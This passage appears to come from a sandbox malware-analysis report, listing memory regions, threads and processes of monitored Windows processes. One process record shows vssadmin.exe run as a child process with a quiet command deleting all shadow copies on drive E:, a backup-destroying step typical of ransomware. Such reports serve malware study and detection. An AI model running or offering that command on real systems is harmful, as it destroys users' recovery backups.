	              id = 5744
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 5745
	        start_va = 0x18391c90000
	          end_va = 0x18391c96fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391c90000"
	        filename = ""

Region:
	              id = 5746
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 5747
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 5748
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 5749
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 5750
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 5751
	        start_va = 0x18391e60000
	          end_va = 0x18391e60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391e60000"
	        filename = ""

Region:
	              id = 5752
	        start_va = 0x18391e70000
	          end_va = 0x18391e70fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391e70000"
	        filename = ""

Region:
	              id = 5753
	        start_va = 0x18391eb0000
	          end_va = 0x18391ebffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391eb0000"
	        filename = ""

Region:
	              id = 5754
	        start_va = 0x18391ec0000
	          end_va = 0x18392047fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018391ec0000"
	        filename = ""

Region:
	              id = 5755
	        start_va = 0x18392050000
	          end_va = 0x183921d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018392050000"
	        filename = ""

Region:
	              id = 5756
	        start_va = 0x183921e0000
	          end_va = 0x183935dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000183921e0000"
	        filename = ""

Region:
	              id = 5757
	        start_va = 0x183935e0000
	          end_va = 0x1839376ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000183935e0000"
	        filename = ""

Region:
	              id = 5758
	        start_va = 0x330d640000
	          end_va = 0x330d67ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000330d640000"
	        filename = ""

Region:
	              id = 5759
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 5760
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 5761
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 5762
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 5763
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 5764
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 5765
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 5766
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 5771
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 5772
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 5773
	        start_va = 0x18393770000
	          end_va = 0x1839391ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018393770000"
	        filename = ""

Region:
	              id = 5779
	        start_va = 0x18393920000
	          end_va = 0x18393c56fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 5780
	        start_va = 0x18391e80000
	          end_va = 0x18391ea0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 5781
	        start_va = 0x183935e0000
	          end_va = 0x18393639fff
	       monitored = 1
	     entry_point = 0x183935f53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 5782
	        start_va = 0x18393760000
	          end_va = 0x1839376ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018393760000"
	        filename = ""

Region:
	              id = 5784
	        start_va = 0x18393c60000
	          end_va = 0x18393e7cfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018393c60000"
	        filename = ""

Region:
	              id = 5785
	        start_va = 0x18393e80000
	          end_va = 0x18394092fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018393e80000"
	        filename = ""

Region:
	              id = 5786
	        start_va = 0x183935e0000
	          end_va = 0x183936f1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000183935e0000"
	        filename = ""

Region:
	              id = 5787
	        start_va = 0x183940a0000
	          end_va = 0x183942b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000183940a0000"
	        filename = ""

Region:
	              id = 5788
	        start_va = 0x18393770000
	          end_va = 0x18393885fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018393770000"
	        filename = ""

Region:
	              id = 5789
	        start_va = 0x18393910000
	          end_va = 0x1839391ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018393910000"
	        filename = ""

Region:
	              id = 5790
	        start_va = 0x330d680000
	          end_va = 0x330d6bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000330d680000"
	        filename = ""

Region:
	              id = 5791
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 5792
	        start_va = 0x18391e80000
	          end_va = 0x18391e80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018391e80000"
	        filename = ""

Region:
	              id = 5793
	        start_va = 0x183942c0000
	          end_va = 0x1839437bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000183942c0000"
	        filename = ""

Region:
	              id = 5794
	        start_va = 0x18391e80000
	          end_va = 0x18391e83fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018391e80000"
	        filename = ""

Region:
	              id = 5795
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 5817
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 5818
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 5824
	        start_va = 0x18391e90000
	          end_va = 0x18391e96fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000018391e90000"
	        filename = ""

Region:
	              id = 5825
	        start_va = 0x18391ea0000
	          end_va = 0x18391ea0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018391ea0000"
	        filename = ""

Region:
	              id = 5826
	        start_va = 0x18393700000
	          end_va = 0x18393700fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018393700000"
	        filename = ""

Region:
	              id = 5827
	        start_va = 0x18393710000
	          end_va = 0x18393714fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 5849
	        start_va = 0x18393720000
	          end_va = 0x18393720fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 5850
	        start_va = 0x18393730000
	          end_va = 0x18393731fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018393730000"
	        filename = ""

Region:
	              id = 5851
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 5852
	        start_va = 0x18393740000
	          end_va = 0x18393740fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 5853
	        start_va = 0x18393750000
	          end_va = 0x18393751fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000018393750000"
	        filename = ""


Thread:
	id = 415
	os_tid = 0x1214


Thread:
	id = 416
	os_tid = 0xd74


Thread:
	id = 418
	os_tid = 0xec0


Thread:
	id = 421
	os_tid = 0x138c


Process:
	id = "79"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2d216000"
	os_pid = "0xf04"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "74"
	os_parent_pid = "0x1268"
	cmd_line = "vssadmin  Delete Shadows /For=E: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5797
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5798
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5799
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5800
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5801
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 5802
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 5803
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 5804
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 5805
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 5806
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 5807
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 5808
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5809
	        start_va = 0x7ecb0000
	          end_va = 0x7ecd2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ecb0000"
	        filename = ""

Region:
	              id = 5810
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5811
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5812
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5813
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5814
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5819
	        start_va = 0x100000
	          end_va = 0x11ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 5820
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5828
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5829
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5830
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5854
	        start_va = 0x4890000
	          end_va = 0x49affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 5855
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5857
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5858
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5859
	        start_va = 0x7ebb0000
	          end_va = 0x7ecaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ebb0000"
	        filename = ""

Region:
	              id = 5878
	        start_va = 0x120000
	          end_va = 0x1ddfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5879
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 5880
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 5881
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5882
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 5883
	        start_va = 0x440000
	          end_va = 0x47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 5884
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 5885
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 5886
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 5899
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 5900
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 5901
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 5902
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 5903
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 5909
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 5910
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 5911
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 5912
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 5913
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 5914
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 5915
	        start_va = 0x49b0000
	          end_va = 0x4b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049b0000"
	        filename = ""

Region:
	              id = 5926
	        start_va = 0x480000
	          end_va = 0x607fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000480000"
	        filename = ""

Region:
	              id = 5927
	        start_va = 0x49b0000
	          end_va = 0x49d9fff
	       monitored = 0
	     entry_point = 0x49b5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5928
	        start_va = 0x4b40000
	          end_va = 0x4b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b40000"
	        filename = ""

Region:
	              id = 5929
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5930
	        start_va = 0x610000
	          end_va = 0x790fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000610000"
	        filename = ""

Region:
	              id = 5931
	        start_va = 0x4890000
	          end_va = 0x489cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 5932
	        start_va = 0x48b0000
	          end_va = 0x49affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048b0000"
	        filename = ""

Region:
	              id = 5933
	        start_va = 0x4b50000
	          end_va = 0x5f4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b50000"
	        filename = ""

Region:
	              id = 5940
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 5941
	        start_va = 0x100000
	          end_va = 0x100fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 5942
	        start_va = 0x110000
	          end_va = 0x11ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000110000"
	        filename = ""

Region:
	              id = 5943
	        start_va = 0x48a0000
	          end_va = 0x48a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 5944
